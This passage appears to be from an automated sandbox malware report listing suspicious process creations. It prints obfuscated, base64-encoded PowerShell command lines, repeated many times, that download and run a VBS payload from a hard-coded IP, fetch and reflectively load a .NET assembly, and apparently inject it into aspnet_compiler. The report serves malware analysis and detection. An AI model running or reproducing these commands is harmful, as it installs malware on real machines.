ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"

Suspicious command line found

Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
